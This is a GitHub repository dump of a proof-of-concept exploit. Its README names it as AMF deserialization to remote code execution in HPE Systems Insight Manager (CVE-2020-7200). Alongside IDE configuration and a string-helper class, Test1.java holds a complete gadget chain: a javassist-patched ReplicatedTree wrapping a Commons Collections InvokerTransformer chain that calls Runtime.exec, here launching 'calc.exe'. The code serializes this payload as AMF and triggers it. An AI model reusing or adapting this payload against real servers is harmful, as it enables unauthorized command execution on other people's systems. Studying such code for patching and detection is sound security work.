├── .idea ├── .gitignore ├── libraries │ ├── AgentRepair.xml │ ├── FastInfoset.xml │ ├── activation.xml │ ├── axis_1_4.xml │ ├── com_azalea_ufl_barcode_1_0.xml │ └── hpsim_util_web.xml ├── misc.xml └── modules.xml ├── ProjectSIM.iml ├── README.md ├── emp.ser ├── out └── production │ └── ProjectSIM │ ├── Strings$ToStringComparator.class │ ├── Strings.class │ ├── Test0.class │ └── Test1.class └── src ├── Strings.java ├── Test0.java └── Test1.java /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Datasource local storage ignored files 5 | /../../../../../:\Research2020\hpe-sim\ProjectSIM\.idea/dataSources/ 6 | /dataSources.local.xml 7 | # Editor-based HTTP Client requests 8 | /httpRequests/ 9 | -------------------------------------------------------------------------------- /.idea/libraries/AgentRepair.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | -------------------------------------------------------------------------------- /.idea/libraries/FastInfoset.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ProjectSIM 2 | HPE Systems Insight Manager (SIM) AMF Deserialization to RCE 3 | 4 | CVE-2020-7200 5 | 6 | This PoC is built by jang 7 | 8 | Thanks to @peterjson 9 | -------------------------------------------------------------------------------- /emp.ser: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/emp.ser -------------------------------------------------------------------------------- /out/production/ProjectSIM/Strings$ToStringComparator.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/out/production/ProjectSIM/Strings$ToStringComparator.class -------------------------------------------------------------------------------- /out/production/ProjectSIM/Strings.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/out/production/ProjectSIM/Strings.class -------------------------------------------------------------------------------- /out/production/ProjectSIM/Test0.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/out/production/ProjectSIM/Test0.class -------------------------------------------------------------------------------- /out/production/ProjectSIM/Test1.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/testanull/ProjectSIM/ec0028d8e1f6b67b5d2688151c5df015fcd86a38/out/production/ProjectSIM/Test1.class -------------------------------------------------------------------------------- /src/Strings.java: -------------------------------------------------------------------------------- 1 | import java.util.Arrays; 2 | import java.util.Comparator; 3 | import java.util.LinkedList; 4 | import java.util.List; 5 | 6 | public class Strings { /** Small string helpers. Every method uses raw {@code Iterable}/{@code List} types, so element types are only checked at runtime. */ /** Joins the elements of {@code strings} with {@code sep}, wrapping each element in {@code prefix} and {@code suffix} when those are non-null. The enhanced-for loop casts each element to String, so a non-String element throws ClassCastException. */ 7 | public static String join(Iterable strings, String sep, String prefix, String suffix) { 8 | final StringBuilder sb = new StringBuilder(); 9 | boolean first = true; 10 | for (String s : strings) { 11 | if (! first) sb.append(sep); 12 | if (prefix != null) sb.append(prefix); 13 | sb.append(s); 14 | if (suffix != null) sb.append(suffix); 15 | first = false; 16 | } 17 | return sb.toString(); 18 | } 19 | /** Returns {@code str} concatenated {@code num} times; {@code num == 0} yields "" and a negative {@code num} throws NegativeArraySizeException from the array allocation. */ 20 | public static String repeat(String str, int num) { 21 | final String[] strs = new String[num]; 22 | Arrays.fill(strs, str); 23 | return join(Arrays.asList(strs), "", "", ""); 24 | } 25 | /** Left-justifies every cell to its column's maximum width and joins the cells of each row with a single space, returning one line per row. Mutates the caller's String[] rows in place (row[i] is overwritten with the padded value). Throws IllegalStateException when a row's length differs from the first row's; an empty {@code rows} fails on {@code rows.get(0)}. */ 26 | public static List formatTable(List rows) { 27 | final Integer[] maxLengths = new Integer[rows.get(0).length]; 28 | for (String[] row : rows) { 29 | if (maxLengths.length != row.length) throw new IllegalStateException("mismatched columns"); 30 | for (int i = 0; i < maxLengths.length; i++) { 31 | if (maxLengths[i] == null || maxLengths[i] < row[i].length()) { 32 | maxLengths[i] = row[i].length(); 33 | } 34 | } 35 | } 36 | 37 | final List lines = new LinkedList(); 38 | for (String[] row : rows) { 39 | for (int i = 0; i < maxLengths.length; i++) { 40 | final String pad = repeat(" ", maxLengths[i] - row[i].length()); 41 | row[i] = row[i] + pad; 42 | } 43 | lines.add(join(Arrays.asList(row), " ", "", "")); 44 | } 45 | return lines; 46 | } 47 | /** Orders objects by the natural order of their {@code toString()} results. */ 48 | public static class ToStringComparator implements Comparator { 49 | public int
compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); } 50 | } 51 | } -------------------------------------------------------------------------------- /src/Test0.java: -------------------------------------------------------------------------------- 1 | import flex.messaging.io.SerializationContext; 2 | import flex.messaging.io.amf.*; 3 | import org.apache.commons.collections.LRUMap; 4 | 5 | import java.io.*; 6 | 7 | public class Test0 { /** Writes an AMF-serialized {@code LRUMap} to {@code emp.ser}. The {@code deserialize} helper appears to reproduce the consuming side: {@code AmfMessageDeserializer.readMessage} is invoked with the default {@code SerializationContext} and no restriction on which classes may be instantiated, which is the AMF deserialization weakness the README labels CVE-2020-7200. A service that accepts AMF from untrusted clients must restrict deserializable classes (and apply the vendor fix) before reading messages. */ /** Serializes an empty {@code LRUMap} as an AMF message and writes the bytes to emp.ser. NOTE(review): the FileOutputStream is closed only on the success path; try-with-resources would also close it when write() throws. */ 8 | public static void main(String[] args) throws Exception{ 9 | LRUMap lruMap = new LRUMap(); 10 | byte[] ser = serialize(lruMap); 11 | FileOutputStream fileOutputStream = new FileOutputStream("emp.ser"); 12 | fileOutputStream.write(ser); 13 | fileOutputStream.close(); 14 | } /** Wraps {@code data} in a {@code MessageBody} inside an {@code ActionMessage} and returns the AMF encoding produced by {@code AmfMessageSerializer} under the default {@code SerializationContext}. */ 15 | public static byte[] serialize(Object data) throws IOException { 16 | MessageBody body = new MessageBody(); 17 | body.setData(data); 18 | 19 | ActionMessage message = new ActionMessage(); 20 | message.addBody(body); 21 | 22 | ByteArrayOutputStream out = new ByteArrayOutputStream(); 23 | 24 | AmfMessageSerializer serializer = new AmfMessageSerializer(); 25 | serializer.initialize(SerializationContext.getSerializationContext(), out, null); 26 | serializer.writeMessage(message); 27 | 28 | return out.toByteArray(); 29 | } 30 | /** Reads {@code amf} back with {@code AmfMessageDeserializer} under the default {@code SerializationContext}. No deserialization class allow-list is configured here, so the library's default type handling applies to whatever types the payload names; a hardened deployment restricts those types before calling readMessage. */ 31 | public static void deserialize(byte[] amf) throws ClassNotFoundException, IOException { 32 | ByteArrayInputStream in = new ByteArrayInputStream(amf); 33 | 34 | AmfMessageDeserializer deserializer = new AmfMessageDeserializer(); 35 | deserializer.initialize(SerializationContext.getSerializationContext(), in, null); 36 | deserializer.readMessage(new ActionMessage(), new ActionContext()); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /src/Test1.java: -------------------------------------------------------------------------------- 1 | 2 | import flex.messaging.io.SerializationContext; 3 | import flex.messaging.io.amf.*; 4 | 5 | import javassist.*; 6 | import
org.apache.commons.collections.Transformer; 7 | import org.apache.commons.collections.functors.ChainedTransformer; 8 | import org.apache.commons.collections.functors.ConstantTransformer; 9 | import org.apache.commons.collections.functors.InvokerTransformer; 10 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 11 | import org.apache.commons.collections.map.LazyMap; 12 | 13 | import org.jgroups.blocks.ReplicatedTree; 14 | 15 | 16 | import java.io.*; 17 | import java.lang.reflect.Field; 18 | import java.nio.file.Files; 19 | import java.util.*; 20 | 21 | public class Test1 { 22 | public static void main(String[] args) throws Exception{ 23 | ClassPool pool = ClassPool.getDefault(); 24 | CtClass ctClass = pool.get("org.jgroups.blocks.ReplicatedTree"); 25 | CtClass ctClass1 = pool.get("byte[]"); 26 | CtField ctField = new CtField(ctClass1, "state", ctClass); 27 | ctClass.addField(ctField); 28 | 29 | ctClass.removeMethod(ctClass.getDeclaredMethod("getState")); 30 | CtMethod ctMethod = CtNewMethod.make("public byte[] getState(){ return this.state; }", ctClass); 31 | ctClass.addMethod(ctMethod); 32 | 33 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 34 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); 35 | objectOutputStream.writeObject(getObject2("calc.exe")); 36 | objectOutputStream.close(); 37 | 38 | byte[] secondObj = byteArrayOutputStream.toByteArray(); 39 | 40 | ReplicatedTree replicatedTree = (ReplicatedTree) ctClass.toClass().getConstructor().newInstance(); 41 | Field f1 = replicatedTree.getClass().getDeclaredField("state"); 42 | f1.setAccessible(true); 43 | f1.set(replicatedTree, secondObj); 44 | 45 | byte[] ser = serialize(replicatedTree); 46 | 47 | FileOutputStream fileOutputStream = new FileOutputStream("emp.ser"); 48 | fileOutputStream.write(ser); 49 | fileOutputStream.close(); 50 | byte[] serContent = Files.readAllBytes((new File("emp.ser")).toPath()); 51 | 
deserialize(serContent); 52 | 53 | } 54 | public static byte[] serialize(Object data) throws IOException { 55 | MessageBody body = new MessageBody(); 56 | body.setData(data); 57 | 58 | ActionMessage message = new ActionMessage(); 59 | message.addBody(body); 60 | 61 | ByteArrayOutputStream out = new ByteArrayOutputStream(); 62 | 63 | AmfMessageSerializer serializer = new AmfMessageSerializer(); 64 | serializer.initialize(SerializationContext.getSerializationContext(), out, null); 65 | serializer.writeMessage(message); 66 | 67 | return out.toByteArray(); 68 | } 69 | 70 | public static void deserialize(byte[] amf) throws ClassNotFoundException, IOException { 71 | ByteArrayInputStream in = new ByteArrayInputStream(amf); 72 | 73 | AmfMessageDeserializer deserializer = new AmfMessageDeserializer(); 74 | deserializer.initialize(SerializationContext.getSerializationContext(), in, null); 75 | deserializer.readMessage(new ActionMessage(), new ActionContext()); 76 | } 77 | 78 | 79 | public static Serializable getObject2(final String command) throws Exception { 80 | 81 | final String[] execArgs = new String[] { command }; 82 | 83 | final Transformer[] transformers = new Transformer[] { 84 | new ConstantTransformer(Runtime.class), 85 | new InvokerTransformer("getMethod", new Class[] { 86 | String.class, Class[].class }, new Object[] { 87 | "getRuntime", new Class[0] }), 88 | new InvokerTransformer("invoke", new Class[] { 89 | Object.class, Object[].class }, new Object[] { 90 | null, new Object[0] }), 91 | new InvokerTransformer("exec", 92 | new Class[] { String.class }, execArgs), 93 | new ConstantTransformer(1) }; 94 | 95 | Transformer transformerChain = new ChainedTransformer(transformers); 96 | 97 | final Map innerMap = new HashMap(); 98 | 99 | final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); 100 | 101 | TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); 102 | 103 | HashSet map = new HashSet(1); 104 | map.add("foo"); 105 | Field f = null; 106 | try { 107 
| f = HashSet.class.getDeclaredField("map"); 108 | } catch (NoSuchFieldException e) { 109 | f = HashSet.class.getDeclaredField("backingMap"); 110 | } 111 | 112 | f.setAccessible(true); 113 | HashMap innimpl = (HashMap) f.get(map); 114 | 115 | Field f2 = null; 116 | try { 117 | f2 = HashMap.class.getDeclaredField("table"); 118 | } catch (NoSuchFieldException e) { 119 | f2 = HashMap.class.getDeclaredField("elementData"); 120 | } 121 | 122 | f2.setAccessible(true); 123 | Object[] array = (Object[]) f2.get(innimpl); 124 | 125 | Object node = array[0]; 126 | if(node == null){ 127 | node = array[1]; 128 | } 129 | 130 | Field keyField = null; 131 | try{ 132 | keyField = node.getClass().getDeclaredField("key"); 133 | }catch(Exception e){ 134 | keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); 135 | } 136 | 137 | keyField.setAccessible(true); 138 | keyField.set(node, entry); 139 | 140 | return map; 141 | 142 | } 143 | 144 | 145 | } 146 | --------------------------------------------------------------------------------